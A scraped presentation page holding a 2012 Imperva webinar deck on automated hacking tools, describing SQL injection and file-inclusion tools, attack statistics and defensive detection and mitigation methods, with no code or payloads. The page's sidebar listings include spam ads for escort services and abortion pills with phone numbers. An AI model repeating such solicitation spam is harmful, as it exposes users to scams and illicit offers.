Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 

Último (20)

Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground

  • 1. Automated Hacking Tools: The New Rock Stars in the Cyber Underground © 2012 Imperva, Inc. All rights reserved.
  • 2. Agenda  Context for HII Reports  Introducing Automated Hacking + Quantifying Automation + Hacking Automation Use Cases + Sample Tools  Analyzing Real World Data  Detection and Mitigation  Questions and Answers 2 © 2012 Imperva, Inc. All rights reserved.
  • 3. Presenter: Amichai Shulman – CTO Imperva  Speaker at Industry Events + RSA, Sybase Techwave, Info Security UK, Black Hat  Lecturer on Info Security + Technion - Israel Institute of Technology  Former Security Consultant to Banks and Financial Services Firms  Leads the Application Defense Center (ADC) + Discovered over 20 commercial application vulnerabilities – Credited by Oracle, MS-SQL, IBM and others Amichai Shulman one of InfoWorld’s “Top 25 CTOs” © 2012 Imperva, Inc. All rights reserved.
  • 4. HII Report Context  Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice + A different approach from vulnerability research  Data set composition + ~50 real world applications + Anonymous Proxies  More than 18 months of data  Powerful analysis system + Combines analytic tools with drill down capabilities 4 © 2012 Imperva, Inc. All rights reserved.
  • 5. Introducing Automated Hacking 5 © 2012 Imperva, Inc. All rights reserved.
  • 6. Quantifying Automation 6 © 2012 Imperva, Inc. All rights reserved.
  • 7. Quantifying Automation RFI SQLi Manual 2% 12% Manual Automatic 88% Automatic 98% 7 © 2012 Imperva, Inc. All rights reserved.
  • 8. Hacking Automation Use Cases  Automation affects the magnitude of the threat posed by hacking Honeypot.org: The Social Dynamics of Hacking 8 © 2012 Imperva, Inc. All rights reserved.
  • 9. Hacking Automation Use Cases  Skilled Hackers + Create more powerful tools + Focus not only on finding vulnerabilities but also on robust automation of their exploit (an engineering challenge)  Professional Hackers (Semi-skilled) + Can increase their business faster and more effectively using automation + Puts more organizations at risk as potential targets  Unskilled Hackers + Increased potential of incidental damages 9 © 2012 Imperva, Inc. All rights reserved.
  • 10. Hacking Automation Use Cases  Botnets + A step further in the evolution of automated hacking + Rather than automating a task it is automation of the entire operation  Includes all steps of the operation + Target selection + Probing + Exploit 10 © 2012 Imperva, Inc. All rights reserved.
  • 11. Automated Hacking Tools  Search engine hacking + Discovery phase + Mostly botnet based today  General scanners + Probing of chosen targets  Focused on attack type  Focused on individual vulnerability + Exist as standalone tools and botnet modules 11 © 2012 Imperva, Inc. All rights reserved.
  • 12. Automated Hacking Tools  High-end  Havij + Slick GUI (point and + Focused on SQL click) Injection attacks + Evasion techniques + Used in attacks by + State of the art attack Lulzsec and vectors Anonymous 12 © 2012 Imperva, Inc. All rights reserved.
  • 13. Automated Hacking Tools 13 © 2012 Imperva, Inc. All rights reserved.
  • 14. Automated Hacking Tools  Professional  SQLmap + Command line + Focused on SQL + Ready for Injection instrumentation  FIMAP + Focused on Remote File Include 14 © 2012 Imperva, Inc. All rights reserved.
  • 15. Automated Hacking Tools 15 © 2012 Imperva, Inc. All rights reserved.
  • 16. Automated Hacking Tools  WhiteHat flipping  Nikto + Public domain, sides low end + Tools aimed at  Nessus vulnerability scanning + Public domain + Automation is essential for (some versions), continuous testing of very friendly GUI large and complex web  Acunetix applications + Powerful commercial tool, + Inherently easier to stolen licenses operate are shared among hackers 16 © 2012 Imperva, Inc. All rights reserved.
  • 17. Analyzing Real World Data 17 © 2012 Imperva, Inc. All rights reserved.
  • 18. Type of Automation  The type of automation is tightly related to the nature of the vulnerability to be exploited  SQL Injection + Tools that focus on an individual application at a time + High volume, high rate traffic generated against a single application  RFI + Tools that try to cover as many applications as possible + Low volume traffic when watching a single application  Search Engine Hacking + Need to bypass search engine restrictions + Highly distributed botnets © 2012 Imperva, Inc. All rights reserved.
  • 19. Type of Automation 19 © 2012 Imperva, Inc. All rights reserved.
  • 20. Type of Automation  RFI Attacks  Many sources attack more than one target © 2012 Imperva, Inc. All rights reserved.
  • 21. Persistence of Sources  A fair amount of attack sources are persistent over time + Persistent source = more than 3 days of activity + 30% of SQLi attacks + 60% of RFI attacks 10000 SQLi Attacks (Log scale) 1000 100 10 1 0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95 100 Activity Days 21 © 2012 Imperva, Inc. All rights reserved.
  • 22. Persistence of Sources  RFI Attacks  Many consistent attackers © 2012 Imperva, Inc. All rights reserved.
  • 23. Persistence of Attack Vectors  RFI Attacks  Collect URLs that host infection script  Some URLs are being used consistently over time © 2012 Imperva, Inc. All rights reserved.
  • 24. Persistence of Attack Vectors  Many shell URLs are used against more than one target © 2012 Imperva, Inc. All rights reserved.
  • 25. Country of Origin  Most attack sources are in the US  Most high rate automation sources are in China! SQLi SQLi Country Hosts % of Hosts Country Hosts % of Hosts USA 3994 80 China 98 30 China 355 7 USA 78 24 United Kingdom 75 2 Netherlands 9 3 Russian Federation 49 1 Morocco 8 2 Canada 40 1 Egypt 7 2 Republic of Korea 33 1 Luxemburg 7 2 Germany 31 1 Brazil 7 2 Brazil 29 1 France 7 2 India 28 1 Indonesia 6 2 France 24 1 Russian Federation 6 2 25 © 2012 Imperva, Inc. All rights reserved.
  • 26. Detection and Mitigation 26 © 2012 Imperva, Inc. All rights reserved.
  • 27. General  Motivation + Automated hacking accounts for a large portion of attack traffic + Being able to detect malicious automation dramatically reduces the stress on other mechanisms designed to detect specific attacks  Challenge + Hard to implement WITHIN applications as automation can be applied against each and every part of the application or the underlying application server © 2012 Imperva, Inc. All rights reserved.
  • 28. Detecting Automated Hacking - Passive  Passive Methods + Watch network traffic “as-is” + Non intrusive, do not affect user experience  Traffic Shape Indicators + We measure suspicious requests (rather than ALL requests) + Measured attributes – Rate – Rate change (ramp-up speed) – Volume + Difficult to measure in an inherently noisy source (NAT)  Request Shape Indicators + Missing headers + Mismatch between headers and location 28 © 2012 Imperva, Inc. All rights reserved.
  • 29. Detecting Automated Hacking - Passive 29 © 2012 Imperva, Inc. All rights reserved.
  • 30. Detecting Automated Hacking - Active  Introduce changes into the server response + Test client’s reaction to changes + May affect user experience – use with care + Verify type of user agent  Browsers support Javascript and an appropriate DOM + Client is expected to complete some computation + Application / GW can validate the computed value  Browsers comply with HTML tags (IMG, IFRAME) + Client is expected to access resource referenced by embedded tags + Failure to access the resources implies that client is an automated script 30 © 2012 Imperva, Inc. All rights reserved.
  • 31. Mitigation - Wisdom of the Crowds  Detected automation feeds into building fingerprints of tools and reputation data for sources  Leveraged when data is collected within a community  Recent regulatory changes endorse the concept of community  Drop requests matching fingerprints or coming from ill reputed sources 31 © 2012 Imperva, Inc. All rights reserved.
  • 32. Mitigation – Challenges and Metering  Introduce changes to the response that require a true browser user-agent before letting any further requests within a session + Application / GW keeps sending the test for any request not in a validated session + A session is validated only if user-agent responds properly  Introduce changes to the response that (based on the previous enforcement) introduce client side latency + Challenge the client to solve a mathematical riddle + Partial hash collisions are a good example 32 © 2012 Imperva, Inc. All rights reserved.
  • 33. Mitigation (cont.)  Introduce CAPTCHA or other test to tell apart a human operator from a script 33 © 2012 Imperva, Inc. All rights reserved.
  • 34. Summary  Automation is ruling the threat landscape + It accounts for the lion share of attack traffic  Automation is used in various forms + In depth scanning / attack of a single target + Wide breadth scanning / attack of multiple applications + Distributed scanning / attack of single / multiple applications 34 © 2012 Imperva, Inc. All rights reserved.
  • 35. Summary (cont.)  Detection and mitigation are essential for reducing noise and focusing resources on the most complex attacks  Detection and mitigation are most effectively deployed out side of the application  Detection and mitigation must include a combination of passive and active measures  Detection and mitigation are best utilized within a community that can generate reputation data 35 © 2012 Imperva, Inc. All rights reserved.
  • 36. Webinar Materials Join Our LinkedIn Group, Imperva Data Security Direct for… Answers to Post-Webinar Attendee Discussions Questions Webinar Webinar Slides Recording Link © 2012 Imperva, Inc. All rights reserved.